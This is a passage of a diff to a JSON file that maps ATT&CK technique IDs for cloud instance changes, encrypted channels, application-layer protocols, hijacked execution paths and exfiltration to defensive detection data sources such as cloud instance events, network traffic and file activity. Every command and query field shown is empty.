"description": "An instance was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "attached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "detached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "updated", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "stopped", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "powered off", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1578.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1578.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ] + ] + }, + { + "technique_id": "T1578.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1027.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1573.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1573.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1574.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1071.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1071.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1048.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + 